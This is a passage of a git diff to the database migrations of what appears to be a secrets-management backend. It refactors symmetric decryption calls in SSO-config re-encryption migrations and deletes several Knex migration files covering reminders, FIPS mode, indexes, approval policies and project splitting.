                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.issuerIV,
@@ -113,9 +105,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCert && el.certIV && el.certTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.certIV,
@@ -194,8 +185,7 @@ const reencryptLdapConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -226,24 +216,19 @@ const reencryptLdapConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-
-        const key = crypto
-          .encryption()
-          .symmetric()
-          .decryptWithRootEncryptionKey({
-            ciphertext: encryptedSymmetricKey,
-            iv: symmetricKeyIV,
-            tag: symmetricKeyTag,
-            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-          });
+        const key = infisicalSymmetricDecrypt({
+          ciphertext: encryptedSymmetricKey,
+          iv: symmetricKeyIV,
+          tag: symmetricKeyTag,
+          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+        });
 
         const decryptedBindDN =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedBindDN && el.bindDNIV && el.bindDNTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.bindDNIV,
@@ -260,9 +245,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedBindPass && el.bindPassIV && el.bindPassTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.bindPassIV,
@@ -279,9 +263,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCACert && el.caCertIV && el.caCertTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.caCertIV,
@@ -354,8 +337,7 @@ const reencryptOidcConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -386,24 +368,19 @@ const reencryptOidcConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-
-        const key = crypto
-          .encryption()
-          .symmetric()
-          .decryptWithRootEncryptionKey({
-            ciphertext: encryptedSymmetricKey,
-            iv: symmetricKeyIV,
-            tag: symmetricKeyTag,
-            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-          });
+        const key = infisicalSymmetricDecrypt({
+          ciphertext: encryptedSymmetricKey,
+          iv: symmetricKeyIV,
+          tag: symmetricKeyTag,
+          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+        });
 
         const decryptedClientId =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedClientId && el.clientIdIV && el.clientIdTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.clientIdIV,
@@ -420,9 +397,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.clientSecretIV,

backend/src/db/migrations/20250513081738_remove-gateway-project-link.ts

@@ -4,7 +4,6 @@ import { inMemoryKeyStore } from "@app/keystore/memory";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -40,8 +39,7 @@ export async function up(knex: Knex): Promise<void> {
       );
 
     initLogger();
-    const superAdminDAL = superAdminDALFactory(knex);
-    const envConfig = await getMigrationEnvConfig(superAdminDAL);
+    const envConfig = getMigrationEnvConfig();
     const keyStore = inMemoryKeyStore();
     const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
 

backend/src/db/migrations/20250701202824_add-reminder-table.ts

@@ -1,43 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "../schemas";
-import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
-
-export async function up(knex: Knex): Promise<void> {
-  if (!(await knex.schema.hasTable(TableName.Reminder))) {
-    await knex.schema.createTable(TableName.Reminder, (t) => {
-      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
-      t.uuid("secretId").nullable();
-      t.foreign("secretId").references("id").inTable(TableName.SecretV2).onDelete("CASCADE");
-      t.string("message", 1024).nullable();
-      t.integer("repeatDays").checkPositive().nullable();
-      t.timestamp("nextReminderDate").notNullable();
-      t.timestamps(true, true, true);
-      t.unique("secretId");
-    });
-  }
-
-  if (!(await knex.schema.hasTable(TableName.ReminderRecipient))) {
-    await knex.schema.createTable(TableName.ReminderRecipient, (t) => {
-      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
-      t.uuid("reminderId").notNullable();
-      t.foreign("reminderId").references("id").inTable(TableName.Reminder).onDelete("CASCADE");
-      t.uuid("userId").notNullable();
-      t.foreign("userId").references("id").inTable(TableName.Users).onDelete("CASCADE");
-      t.timestamps(true, true, true);
-      t.index("reminderId");
-      t.index("userId");
-      t.unique(["reminderId", "userId"]);
-    });
-  }
-
-  await createOnUpdateTrigger(knex, TableName.Reminder);
-  await createOnUpdateTrigger(knex, TableName.ReminderRecipient);
-}
-
-export async function down(knex: Knex): Promise<void> {
-  await dropOnUpdateTrigger(knex, TableName.Reminder);
-  await dropOnUpdateTrigger(knex, TableName.ReminderRecipient);
-  await knex.schema.dropTableIfExists(TableName.ReminderRecipient);
-  await knex.schema.dropTableIfExists(TableName.Reminder);
-}

backend/src/db/migrations/20250705074703_fips-mode.ts

@@ -1,23 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "../schemas";
-
-export async function up(knex: Knex): Promise<void> {
-  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
-
-  if (!hasFipsModeColumn) {
-    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
-      table.boolean("fipsEnabled").notNullable().defaultTo(false);
-    });
-  }
-}
-
-export async function down(knex: Knex): Promise<void> {
-  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
-
-  if (hasFipsModeColumn) {
-    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
-      table.dropColumn("fipsEnabled");
-    });
-  }
-}

backend/src/db/migrations/20250710022434_add-index-for-access-token.ts

@@ -1,46 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "../schemas";
-
-const MIGRATION_TIMEOUT = 30 * 60 * 1000; // 30 minutes
-
-export async function up(knex: Knex): Promise<void> {
-  const result = await knex.raw("SHOW statement_timeout");
-  const originalTimeout = result.rows[0].statement_timeout;
-
-  try {
-    await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);
-
-    // iat means IdentityAccessToken
-    await knex.raw(`
-          CREATE INDEX IF NOT EXISTS idx_iat_identity_id 
-          ON ${TableName.IdentityAccessToken} ("identityId")
-        `);
-
-    await knex.raw(`
-          CREATE INDEX IF NOT EXISTS idx_iat_ua_client_secret_id 
-          ON ${TableName.IdentityAccessToken} ("identityUAClientSecretId")
-        `);
-  } finally {
-    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
-  }
-}
-
-export async function down(knex: Knex): Promise<void> {
-  const result = await knex.raw("SHOW statement_timeout");
-  const originalTimeout = result.rows[0].statement_timeout;
-
-  try {
-    await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);
-
-    await knex.raw(`
-          DROP INDEX IF EXISTS idx_iat_identity_id
-        `);
-
-    await knex.raw(`
-          DROP INDEX IF EXISTS idx_iat_ua_client_secret_id
-        `);
-  } finally {
-    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
-  }
-}

backend/src/db/migrations/20250710115149_required-path-on-approval-policies.ts

@@ -1,55 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "../schemas";
-
-export async function up(knex: Knex): Promise<void> {
-  const existingSecretApprovalPolicies = await knex(TableName.SecretApprovalPolicy)
-    .whereNull("secretPath")
-    .orWhere("secretPath", "");
-
-  const existingAccessApprovalPolicies = await knex(TableName.AccessApprovalPolicy)
-    .whereNull("secretPath")
-    .orWhere("secretPath", "");
-
-  // update all the secret approval policies secretPath to be "/**"
-  if (existingSecretApprovalPolicies.length) {
-    await knex(TableName.SecretApprovalPolicy)
-      .whereIn(
-        "id",
-        existingSecretApprovalPolicies.map((el) => el.id)
-      )
-      .update({
-        secretPath: "/**"
-      });
-  }
-
-  // update all the access approval policies secretPath to be "/**"
-  if (existingAccessApprovalPolicies.length) {
-    await knex(TableName.AccessApprovalPolicy)
-      .whereIn(
-        "id",
-        existingAccessApprovalPolicies.map((el) => el.id)
-      )
-      .update({
-        secretPath: "/**"
-      });
-  }
-
-  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
-    table.string("secretPath").notNullable().alter();
-  });
-
-  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
-    table.string("secretPath").notNullable().alter();
-  });
-}
-
-export async function down(knex: Knex): Promise<void> {
-  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
-    table.string("secretPath").nullable().alter();
-  });
-
-  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
-    table.string("secretPath").nullable().alter();
-  });
-}

backend/src/db/migrations/20250710153448_adjust-approval-request-user-cols.ts

@@ -1,35 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "@app/db/schemas";
-
-export async function up(knex: Knex): Promise<void> {
-  const hasCommitterCol = await knex.schema.hasColumn(TableName.SecretApprovalRequest, "committerUserId");
-
-  if (hasCommitterCol) {
-    await knex.schema.alterTable(TableName.SecretApprovalRequest, (tb) => {
-      tb.uuid("committerUserId").nullable().alter();
-    });
-  }
-
-  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
-
-  if (hasRequesterCol) {
-    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
-      tb.dropForeign("requestedByUserId");
-      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");
-    });
-  }
-}
-
-export async function down(knex: Knex): Promise<void> {
-  // can't undo committer nullable
-
-  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
-
-  if (hasRequesterCol) {
-    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
-      tb.dropForeign("requestedByUserId");
-      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("SET NULL");
-    });
-  }
-}

backend/src/db/migrations/20250711005900_github-app-connection-to-environments.ts

@@ -1,68 +0,0 @@
-import { Knex } from "knex";
-
-import { inMemoryKeyStore } from "@app/keystore/memory";
-import { selectAllTableCols } from "@app/lib/knex";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
-
-import { TableName } from "../schemas";
-import { getMigrationEnvConfig } from "./utils/env-config";
-import { getMigrationEncryptionServices } from "./utils/services";
-
-export async function up(knex: Knex) {
-  const existingSuperAdminsWithGithubConnection = await knex(TableName.SuperAdmin)
-    .select(selectAllTableCols(TableName.SuperAdmin))
-    .whereNotNull(`${TableName.SuperAdmin}.encryptedGitHubAppConnectionClientId`);
-
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
-  const keyStore = inMemoryKeyStore();
-  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
-
-  const decryptor = kmsService.decryptWithRootKey();
-  const encryptor = kmsService.encryptWithRootKey();
-
-  const tasks = existingSuperAdminsWithGithubConnection.map(async (admin) => {
-    const overrides = (
-      admin.encryptedEnvOverrides ? JSON.parse(decryptor(Buffer.from(admin.encryptedEnvOverrides)).toString()) : {}
-    ) as Record<string, string>;
-
-    if (admin.encryptedGitHubAppConnectionClientId) {
-      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_ID = decryptor(
-        admin.encryptedGitHubAppConnectionClientId
-      ).toString();
-    }
-
-    if (admin.encryptedGitHubAppConnectionClientSecret) {
-      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_SECRET = decryptor(
-        admin.encryptedGitHubAppConnectionClientSecret
-      ).toString();
-    }
-
-    if (admin.encryptedGitHubAppConnectionPrivateKey) {
-      overrides.INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY = decryptor(
-        admin.encryptedGitHubAppConnectionPrivateKey
-      ).toString();
-    }
-
-    if (admin.encryptedGitHubAppConnectionSlug) {
-      overrides.INF_APP_CONNECTION_GITHUB_APP_SLUG = decryptor(admin.encryptedGitHubAppConnectionSlug).toString();
-    }
-
-    if (admin.encryptedGitHubAppConnectionId) {
-      overrides.INF_APP_CONNECTION_GITHUB_APP_ID = decryptor(admin.encryptedGitHubAppConnectionId).toString();
-    }
-
-    const encryptedEnvOverrides = encryptor(Buffer.from(JSON.stringify(overrides)));
-
-    await knex(TableName.SuperAdmin).where({ id: admin.id }).update({
-      encryptedEnvOverrides
-    });
-  });
-
-  await Promise.all(tasks);
-}
-
-export async function down() {
-  // No down migration needed as this migration is only for data transformation
-  // and does not change the schema.
-}

backend/src/db/migrations/20250717195959_gatewayid-for-app-conn.ts

@@ -1,19 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "../schemas";
-
-export async function up(knex: Knex): Promise<void> {
-  if (!(await knex.schema.hasColumn(TableName.AppConnection, "gatewayId"))) {
-    await knex.schema.alterTable(TableName.AppConnection, (t) => {
-      t.uuid("gatewayId").nullable();
-    });
-  }
-}
-
-export async function down(knex: Knex): Promise<void> {
-  if (await knex.schema.hasColumn(TableName.AppConnection, "gatewayId")) {
-    await knex.schema.alterTable(TableName.AppConnection, (t) => {
-      t.dropColumn("gatewayId");
-    });
-  }
-}

backend/src/db/migrations/20250718133527_project-unify-revert.ts

@@ -1,432 +0,0 @@
-import slugify from "@sindresorhus/slugify";
-import { Knex } from "knex";
-import { v4 as uuidV4 } from "uuid";
-
-import { alphaNumericNanoId } from "@app/lib/nanoid";
-
-import { ProjectType, TableName } from "../schemas";
-
-/* eslint-disable no-await-in-loop,@typescript-eslint/ban-ts-comment */
-
-// Single query to get all projects that need any kind of kickout
-const getProjectsNeedingKickouts = async (
-  knex: Knex
-): Promise<
-  Array<{
-    id: string;
-    defaultProduct: string;
-    needsSecretManager: boolean;
-    needsCertManager: boolean;
-    needsSecretScanning: boolean;
-    needsKms: boolean;
-    needsSsh: boolean;
-  }>
-> => {
-  const result = await knex.raw(
-    `
-SELECT DISTINCT
-  p.id,
-  p."defaultProduct",
-  
-  -- Use CASE with direct joins instead of EXISTS subqueries
-  CASE WHEN p."defaultProduct" != 'secret-manager' AND s.secret_exists IS NOT NULL THEN true ELSE false END AS "needsSecretManager",
-  CASE WHEN p."defaultProduct" != 'cert-manager' AND ca.ca_exists IS NOT NULL THEN true ELSE false END AS "needsCertManager", 
-  CASE WHEN p."defaultProduct" != 'secret-scanning' AND ssds.ssds_exists IS NOT NULL THEN true ELSE false END AS "needsSecretScanning",
-  CASE WHEN p."defaultProduct" != 'kms' AND kk.kms_exists IS NOT NULL THEN true ELSE false END AS "needsKms",
-  CASE WHEN p."defaultProduct" != 'ssh' AND sc.ssh_exists IS NOT NULL THEN true ELSE false END AS "needsSsh"
-
-FROM projects p
-LEFT JOIN (
-  SELECT DISTINCT e."projectId", 1 as secret_exists
-  FROM secrets_v2 s
-  JOIN secret_folders sf ON sf.id = s."folderId"
-  JOIN project_environments e ON e.id = sf."envId"
-) s ON s."projectId" = p.id AND p."defaultProduct" != 'secret-manager'
-
-LEFT JOIN (
-  SELECT DISTINCT "projectId", 1 as ca_exists
-  FROM certificate_authorities
-) ca ON ca."projectId" = p.id AND p."defaultProduct" != 'cert-manager'
-
-LEFT JOIN (
-  SELECT DISTINCT "projectId", 1 as ssds_exists
-  FROM secret_scanning_data_sources
-) ssds ON ssds."projectId" = p.id AND p."defaultProduct" != 'secret-scanning'
-
-LEFT JOIN (
-  SELECT DISTINCT "projectId", 1 as kms_exists
-  FROM kms_keys
-  WHERE "isReserved" = false
-) kk ON kk."projectId" = p.id AND p."defaultProduct" != 'kms'
-
-LEFT JOIN (
-  SELECT DISTINCT sca."projectId", 1 as ssh_exists
-  FROM ssh_certificates sc
-  JOIN ssh_certificate_authorities sca ON sca.id = sc."sshCaId"
-) sc ON sc."projectId" = p.id AND p."defaultProduct" != 'ssh'
-
-WHERE p."defaultProduct" IS NOT NULL
-  AND (
-    (p."defaultProduct" != 'secret-manager' AND s.secret_exists IS NOT NULL) OR
-    (p."defaultProduct" != 'cert-manager' AND ca.ca_exists IS NOT NULL) OR
-    (p."defaultProduct" != 'secret-scanning' AND ssds.ssds_exists IS NOT NULL) OR
-    (p."defaultProduct" != 'kms' AND kk.kms_exists IS NOT NULL) OR
-    (p."defaultProduct" != 'ssh' AND sc.ssh_exists IS NOT NULL)
-  )
-    `
-  );
-
-  return result.rows;
-};
-
-const newProject = async (knex: Knex, projectId: string, projectType: ProjectType) => {
-  const newProjectId = uuidV4();
-  const project = await knex(TableName.Project).where("id", projectId).first();
-  await knex(TableName.Project).insert({
-    ...project,
-    type: projectType,
-    defaultProduct: null,
-    // @ts-ignore id is required
-    id: newProjectId,
-    slug: slugify(`${project?.name}-${alphaNumericNanoId(8)}`)
-  });
-
-  const customRoleMapping: Record<string, string> = {};
-  const projectCustomRoles = await knex(TableName.ProjectRoles).where("projectId", projectId);
-  if (projectCustomRoles.length) {
-    await knex.batchInsert(
-      TableName.ProjectRoles,
-      projectCustomRoles.map((el) => {
-        const id = uuidV4();
-        customRoleMapping[el.id] = id;
-        return {
-          ...el,
-          id,
-          projectId: newProjectId,
-          permissions: el.permissions ? JSON.stringify(el.permissions) : el.permissions
-        };
-      })
-    );
-  }
-  const groupMembershipMapping: Record<string, string> = {};
-  const groupMemberships = await knex(TableName.GroupProjectMembership).where("projectId", projectId);
-  if (groupMemberships.length) {
-    await knex.batchInsert(
-      TableName.GroupProjectMembership,
-      groupMemberships.map((el) => {
-        const id = uuidV4();
-        groupMembershipMapping[el.id] = id;
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-
-  const groupMembershipRoles = await knex(TableName.GroupProjectMembershipRole).whereIn(
-    "projectMembershipId",
-    groupMemberships.map((el) => el.id)
-  );
-  if (groupMembershipRoles.length) {
-    await knex.batchInsert(
-      TableName.GroupProjectMembershipRole,
-      groupMembershipRoles.map((el) => {
-        const id = uuidV4();
-        const projectMembershipId = groupMembershipMapping[el.projectMembershipId];
-        const customRoleId = el.customRoleId ? customRoleMapping[el.customRoleId] : el.customRoleId;
-        return { ...el, id, projectMembershipId, customRoleId };
-      })
-    );
-  }
-
-  const identityProjectMembershipMapping: Record<string, string> = {};
-  const identities = await knex(TableName.IdentityProjectMembership).where("projectId", projectId);
-  if (identities.length) {
-    await knex.batchInsert(
-      TableName.IdentityProjectMembership,
-      identities.map((el) => {
-        const id = uuidV4();
-        identityProjectMembershipMapping[el.id] = id;
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-
-  const identitiesRoles = await knex(TableName.IdentityProjectMembershipRole).whereIn(
-    "projectMembershipId",
-    identities.map((el) => el.id)
-  );
-  if (identitiesRoles.length) {
-    await knex.batchInsert(
-      TableName.IdentityProjectMembershipRole,
-      identitiesRoles.map((el) => {
-        const id = uuidV4();
-        const projectMembershipId = identityProjectMembershipMapping[el.projectMembershipId];
-        const customRoleId = el.customRoleId ? customRoleMapping[el.customRoleId] : el.customRoleId;
-        return { ...el, id, projectMembershipId, customRoleId };
-      })
-    );
-  }
-
-  const projectMembershipMapping: Record<string, string> = {};
-  const projectUserMembers = await knex(TableName.ProjectMembership).where("projectId", projectId);
-  if (projectUserMembers.length) {
-    await knex.batchInsert(
-      TableName.ProjectMembership,
-      projectUserMembers.map((el) => {
-        const id = uuidV4();
-        projectMembershipMapping[el.id] = id;
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-  const membershipRoles = await knex(TableName.ProjectUserMembershipRole).whereIn(
-    "projectMembershipId",
-    projectUserMembers.map((el) => el.id)
-  );
-  if (membershipRoles.length) {
-    await knex.batchInsert(
-      TableName.ProjectUserMembershipRole,
-      membershipRoles.map((el) => {
-        const id = uuidV4();
-        const projectMembershipId = projectMembershipMapping[el.projectMembershipId];
-        const customRoleId = el.customRoleId ? customRoleMapping[el.customRoleId] : el.customRoleId;
-        return { ...el, id, projectMembershipId, customRoleId };
-      })
-    );
-  }
-
-  const kmsKeys = await knex(TableName.KmsKey).where("projectId", projectId).andWhere("isReserved", true);
-  if (kmsKeys.length) {
-    await knex.batchInsert(
-      TableName.KmsKey,
-      kmsKeys.map((el) => {
-        const id = uuidV4();
-        const slug = slugify(alphaNumericNanoId(8).toLowerCase());
-        return { ...el, id, slug, projectId: newProjectId };
-      })
-    );
-  }
-
-  const projectBot = await knex(TableName.ProjectBot).where("projectId", projectId).first();
-  if (projectBot) {
-    const newProjectBot = { ...projectBot, id: uuidV4(), projectId: newProjectId };
-    await knex(TableName.ProjectBot).insert(newProjectBot);
-  }
-
-  const projectKeys = await knex(TableName.ProjectKeys).where("projectId", projectId);
-  if (projectKeys.length) {
-    await knex.batchInsert(
-      TableName.ProjectKeys,
-      projectKeys.map((el) => {
-        const id = uuidV4();
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-
-  const projectGateways = await knex(TableName.ProjectGateway).where("projectId", projectId);
-  if (projectGateways.length) {
-    await knex.batchInsert(
-      TableName.ProjectGateway,
-      projectGateways.map((el) => {
-        const id = uuidV4();
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-
-  const projectSlackConfigs = await knex(TableName.ProjectSlackConfigs).where("projectId", projectId);
-  if (projectSlackConfigs.length) {
-    await knex.batchInsert(
-      TableName.ProjectSlackConfigs,
-      projectSlackConfigs.map((el) => {
-        const id = uuidV4();
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-
-  const projectMicrosoftTeamsConfigs = await knex(TableName.ProjectMicrosoftTeamsConfigs).where("projectId", projectId);
-  if (projectMicrosoftTeamsConfigs.length) {
-    await knex.batchInsert(
-      TableName.ProjectMicrosoftTeamsConfigs,
-      projectMicrosoftTeamsConfigs.map((el) => {
-        const id = uuidV4();
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-
-  const trustedIps = await knex(TableName.TrustedIps).where("projectId", projectId);
-  if (trustedIps.length) {
-    await knex.batchInsert(
-      TableName.TrustedIps,
-      trustedIps.map((el) => {
-        const id = uuidV4();
-        return { ...el, id, projectId: newProjectId };
-      })
-    );
-  }
-
-  return newProjectId;
-};
-
-const kickOutSecretManagerProject = async (knex: Knex, oldProjectId: string) => {
-  const newProjectId = await newProject(knex, oldProjectId, ProjectType.SecretManager);
-  await knex(TableName.IntegrationAuth).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.Environment).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SecretBlindIndex).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SecretSync).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SecretTag).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SecretReminderRecipients).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.ServiceToken).where("projectId", oldProjectId).update("projectId", newProjectId);
-};
-
-const kickOutCertManagerProject = async (knex: Knex, oldProjectId: string) => {
-  const newProjectId = await newProject(knex, oldProjectId, ProjectType.CertificateManager);
-  await knex(TableName.CertificateAuthority).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.Certificate).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.PkiSubscriber).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.PkiCollection).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.PkiAlert).where("projectId", oldProjectId).update("projectId", newProjectId);
-};
-
-const kickOutSecretScanningProject = async (knex: Knex, oldProjectId: string) => {
-  const newProjectId = await newProject(knex, oldProjectId, ProjectType.SecretScanning);
-  await knex(TableName.SecretScanningConfig).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SecretScanningDataSource).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SecretScanningFinding).where("projectId", oldProjectId).update("projectId", newProjectId);
-};
-
-const kickOutKmsProject = async (knex: Knex, oldProjectId: string) => {
-  const newProjectId = await newProject(knex, oldProjectId, ProjectType.KMS);
-  await knex(TableName.KmsKey)
-    .where("projectId", oldProjectId)
-    .andWhere("isReserved", false)
-    .update("projectId", newProjectId);
-  await knex(TableName.KmipClient).where("projectId", oldProjectId).update("projectId", newProjectId);
-};
-
-const kickOutSshProject = async (knex: Knex, oldProjectId: string) => {
-  const newProjectId = await newProject(knex, oldProjectId, ProjectType.SSH);
-  await knex(TableName.SshHost).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.ProjectSshConfig).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SshCertificateAuthority).where("projectId", oldProjectId).update("projectId", newProjectId);
-  await knex(TableName.SshHostGroup).where("projectId", oldProjectId).update("projectId", newProjectId);
-};
-
-const BATCH_SIZE = 1000;
-const MIGRATION_TIMEOUT = 30 * 60 * 1000; // 30 minutes
-
-export async function up(knex: Knex): Promise<void> {
-  const result = await knex.raw("SHOW statement_timeout");
-  const originalTimeout = result.rows[0].statement_timeout;
-
-  try {
-    await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);
-
-    const hasTemplateTypeColumn = await knex.schema.hasColumn(TableName.ProjectTemplates, "type");
-    if (hasTemplateTypeColumn) {
-      await knex(TableName.ProjectTemplates).whereNull("type").update({
-        type: ProjectType.SecretManager
-      });
-      await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
-        t.string("type").notNullable().defaultTo(ProjectType.SecretManager).alter();
-      });
-    }
-
-    const hasTypeColumn = await knex.schema.hasColumn(TableName.Project, "type");
-    const hasDefaultTypeColumn = await knex.schema.hasColumn(TableName.Project, "defaultProduct");
-    if (hasTypeColumn && hasDefaultTypeColumn) {
-      await knex(TableName.Project).update({
-        // eslint-disable-next-line
-        // @ts-ignore this is because this field is created later
-        type: knex.raw(`"defaultProduct"`)
-      });
-
-      await knex.schema.alterTable(TableName.Project, (t) => {
-        t.string("type").notNullable().alter();
-        t.string("defaultProduct").nullable().alter();
-      });
-
-      // Get all projects that need kickouts in a single query
-      const projectsNeedingKickouts = await getProjectsNeedingKickouts(knex);
-
-      // Process projects in batches to avoid overwhelming the database
-      for (let i = 0; i < projectsNeedingKickouts.length; i += projectsNeedingKickouts.length) {
-        const batch = projectsNeedingKickouts.slice(i, i + BATCH_SIZE);
-        const processedIds: string[] = [];
-
-        for (const project of batch) {
-          const kickoutPromises: Promise<void>[] = [];
-
-          // Only add kickouts that are actually needed (flags are pre-computed)
-          if (project.needsSecretManager) {
-            kickoutPromises.push(kickOutSecretManagerProject(knex, project.id));
-          }
-          if (project.needsCertManager) {
-            kickoutPromises.push(kickOutCertManagerProject(knex, project.id));
-          }
-          if (project.needsKms) {
-            kickoutPromises.push(kickOutKmsProject(knex, project.id));
-          }
